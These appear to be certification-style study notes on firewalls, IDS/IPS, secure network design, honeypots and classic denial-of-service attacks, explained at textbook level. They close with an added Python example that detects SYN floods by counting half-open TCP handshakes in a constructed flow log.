looks at the content on the requested web page and blocks the request depending on filters.
used to block inappropriate content in the context of the situation.
associated with "deep packet inspection".
Open-source vs proprietary firewalls
Open source
one in which the vendor makes the license freely available and allows access to the source code, though it might ask for an optional donation.
there is no vendor support included with open source, so you might pay a third party (or the project's commercial arm) for support in a production environment.
one of the more popular open-source firewalls is pfSense, the details for which can be found at https://www.pfsense.org/.

Proprietary
are more expensive but tend to provide more/better protection and more functionality and support (at a cost).
many vendors in this space, including Cisco, Check Point, Palo Alto, Barracuda. but "no source code access".
hardware vs software
Hardware
a piece of purpose-built network hardware.
may offer more configurable support for LAN and WAN connections.
often has superior throughput versus software because it is hardware designed for the speeds and connections common to an enterprise network.

Software
software-based firewalls that you might install on your own hardware.
provide flexibility to place firewalls anywhere you'd like in your organization.
on servers and workstations, you can run a host-based firewall.
host-based (software) firewalls are more vulnerable in some aspects: they share the host's attack surface, and a compromise of the host can disable them.

application vs host-based vs virtual
Application firewall
typically catered specifically to application communications; often that is HTTP or web traffic. An example is a next generation firewall (NGFW).

Host-based firewall
an application installed on a host OS, such as Windows or Linux, on both client and server operating systems.

Virtual firewall
in the cloud, firewalls are implemented as virtual network appliances (VNA).
available from both the CSP directly and third-party partners (commercial firewall vendors).
IDS and IPS
Intrusion Detection System (IDS)
analyzes whole packets, both header and payload, looking for known events. When a known event is detected, a log message is generated.
reports and/or alerts.

Intrusion Prevention System (IPS)
analyzes whole packets, both header and payload, looking for known events. When a known event is detected, the packet is rejected.
takes action!

types of ids systems
Behavior-based (anomaly) IDS
creates a baseline of activity to identify normal behavior and then measures system performance against the baseline to detect abnormal behavior.
can detect previously unknown attack methods (at the cost of more false positives).

Knowledge-based (signature) IDS
uses signatures similar to the signature definitions used by anti-malware software.
only effective against known attack methods.

Both host-based (HIDS) and network-based (NIDS) systems can be knowledge based, behavior based, or a combination of both.

Host-based IDS and IPS
IDS/IPS in software form, installed on a host (often a server).
Host-based Intrusion Detection System (HIDS): analyzes whole packets, both header and payload, looking for known events. When a known event is detected, a log message is generated.
Host-based Intrusion Prevention System (HIPS): analyzes whole packets, both header and payload, looking for known events. When a known event is detected, the packet is rejected.

Network-based IDS and IPS
IDS/IPS at the network level, often in hardware form.
Network-based Intrusion Detection System (NIDS): analyzes whole packets, both header and payload, looking for known events. When a known event is detected, a log message is generated.
Network-based Intrusion Prevention System (NIPS): analyzes whole packets, both header and payload, looking for known events. When a known event is detected, the packet is rejected.
Modes of Operation
Inline, aka "in-band"
NIDS/NIPS placed on or near the firewall as an additional layer of security; all traffic passes through the sensor, so it can drop packets (IPS) but also becomes a potential bottleneck or point of failure.

Passive, aka "out-of-band"
traffic does not go through the NIPS/NIDS; it sees a copy via a SPAN/mirror port or a network tap. sensors and collectors forward alerts to the NIDS, which can alert but cannot block the packet it just saw.

Network appliances
sensors can be placed on a network to alert the NIDS of any changes in traffic patterns on the network.
if you place a sensor on the Internet side of the network, it can scan all of the traffic from the Internet (including the noise the firewall would have dropped).
Secure Network Design
Bastion host
a computer or appliance that is exposed on the Internet and has been hardened by removing all unnecessary elements, such as services, programs, protocols, and ports.

Screened host
a firewall-protected system logically positioned just inside a private network.

Screened subnet (MOST SECURE)
similar to the screened host in concept, except a subnet is placed between two routers or firewalls and the bastion host(s) is located within that subnet.

Proxy
a proxy server functions on behalf of the client requesting service, masking the true origin of the request to the resource.
Secure Network Design
Honeypot
lure bad people into doing bad things, and let you watch them.
only ENTICE, not ENTRAP: enticement is leaving an apparently attractive, vulnerable system in place and recording what the attacker does on their own initiative; entrapment is encouraging a crime the person would not otherwise have committed, and evidence gathered that way may be inadmissible. For example, allowing the download of a fake payroll file would be entrapment.
remember this difference!
goal is to distract from real assets and isolate the attacker in a padded cell until you can track them down.
network attacks
Teardrop Attack
a denial-of-service (DoS) attack that involves sending fragmented packets with overlapping fragment offsets to a target machine. A machine with a bug in its TCP/IP fragment reassembly cannot reassemble the overlapping fragments and crashes.

Fraggle Attack
a denial-of-service (DoS) attack that sends a large amount of spoofed UDP traffic (typically to the echo and chargen services) to a network's broadcast address; every host that answers floods the spoofed source. It is very similar to a Smurf attack, which uses spoofed ICMP echo requests to a third-party network's broadcast address rather than UDP to achieve the same goal.

Land Attack
a Layer 4 denial of service (DoS) attack in which the attacker sets the source and destination addresses and ports of a TCP segment to be the same (the victim's own). A vulnerable machine will crash or freeze due to the packet being repeatedly processed by the TCP stack.
network attacks
SYN Flood
a form of denial-of-service attack in which an attacker sends a succession of SYN requests (often from spoofed sources) to a target's system, leaving many half-open connections, in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. SYN cookies are the usual mitigation: the server avoids allocating connection state until the final ACK arrives.

Ping of Death
employs an oversized ping packet. The maximum IPv4 packet size is 65,535 bytes; ping of death sends a fragmented packet that reassembles to 65,536 bytes or larger, overflowing the receiver's reassembly buffer.

1) SYN 2) SYN-ACK 3) ACK
Know the TCP 3-way handshake, the process used in a TCP/IP network to make a connection between the client and server: the client sends SYN, the server replies SYN-ACK (and, without SYN cookies, allocates state for the half-open connection), and the client's ACK completes it.
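The half-open connections a SYN flood leaves behind, as an added example that is not from the slide deck: it walks a constructed TCP flow log through the three handshake steps and reports sources that open many connections without ever finishing one, plus services whose half-open count is high regardless of source (which is what a spoofed-source flood looks like). The log format, addresses and thresholds are made up for the example.

```python
"""Added example (not from the slide deck): spot a SYN flood in a constructed
TCP flow log by tracking each 3-way handshake and counting, per source and per
service, the connections that never complete. Log format and addresses are made up."""
from collections import defaultdict
from typing import Dict, Iterable, Tuple

# constructed log: "<seq> <src_ip>:<src_port> <dst_ip>:<dst_port> <flags>"
LOG = """\
1 192.0.2.10:40001 10.0.0.5:443 S
2 10.0.0.5:443 192.0.2.10:40001 SA
3 192.0.2.10:40001 10.0.0.5:443 A
4 198.51.100.9:1001 10.0.0.5:443 S
5 10.0.0.5:443 198.51.100.9:1001 SA
6 198.51.100.9:1002 10.0.0.5:443 S
7 198.51.100.9:1003 10.0.0.5:443 S
8 198.51.100.9:1004 10.0.0.5:443 S
9 198.51.100.9:1005 10.0.0.5:443 S
10 198.51.100.9:1006 10.0.0.5:443 S
11 203.0.113.1:2000 10.0.0.5:443 S
12 203.0.113.2:2000 10.0.0.5:443 S
13 203.0.113.3:2000 10.0.0.5:443 S
14 203.0.113.4:2000 10.0.0.5:443 S
15 203.0.113.5:2000 10.0.0.5:443 S
16 192.0.2.11:40002 10.0.0.5:22 S
17 10.0.0.5:22 192.0.2.11:40002 SA
18 192.0.2.11:40002 10.0.0.5:22 A
"""

Key = Tuple[str, int, str, int]   # (client_ip, client_port, server_ip, server_port)


def parse_line(line: str) -> dict:
    _, src, dst, flags = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return {"src": sip, "sport": int(sport), "dst": dip, "dport": int(dport), "flags": flags}


def handshake_state(records: Iterable[dict]) -> Dict[Key, str]:
    """Advance each client-initiated connection through SYN -> SYN-ACK -> ACK."""
    state: Dict[Key, str] = {}
    for r in records:
        if r["flags"] == "S":                       # step 1: client SYN
            state[(r["src"], r["sport"], r["dst"], r["dport"])] = "syn-sent"
        elif r["flags"] == "SA":                    # step 2: server SYN-ACK (server is src)
            key = (r["dst"], r["dport"], r["src"], r["sport"])
            if state.get(key) == "syn-sent":
                state[key] = "half-open"
        elif r["flags"] == "A":                     # step 3: client ACK completes it
            key = (r["src"], r["sport"], r["dst"], r["dport"])
            if state.get(key) == "half-open":
                state[key] = "established"
    return state


def detect_syn_flood(log_text: str, per_source: int = 5, per_service: int = 10) -> dict:
    """Flag sources with >= per_source incomplete handshakes and no completed one,
    and services with >= per_service incomplete handshakes from any source."""
    state = handshake_state(parse_line(l) for l in log_text.splitlines() if l.strip())
    per_src = defaultdict(lambda: {"half_open": 0, "established": 0})
    per_dst: Dict[Tuple[str, int], int] = defaultdict(int)
    for (client, _, server, sport), st in state.items():
        if st == "established":
            per_src[client]["established"] += 1
        else:                                       # "syn-sent" or "half-open": never finished
            per_src[client]["half_open"] += 1
            per_dst[(server, sport)] += 1
    return {
        "sources": sorted(c for c, v in per_src.items()
                          if v["half_open"] >= per_source and v["established"] == 0),
        "services": sorted(k for k, n in per_dst.items() if n >= per_service),
        "half_open_total": sum(per_dst.values()),
    }


if __name__ == "__main__":
    print(detect_syn_flood(LOG))
```

The per-source rule catches the single noisy host (198.51.100.9); the 203.0.113.x SYNs, one per address, only show up in the per-service count, which is the signal that matters when the sources are spoofed. In production the same logic runs over a sliding time window rather than a whole log.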
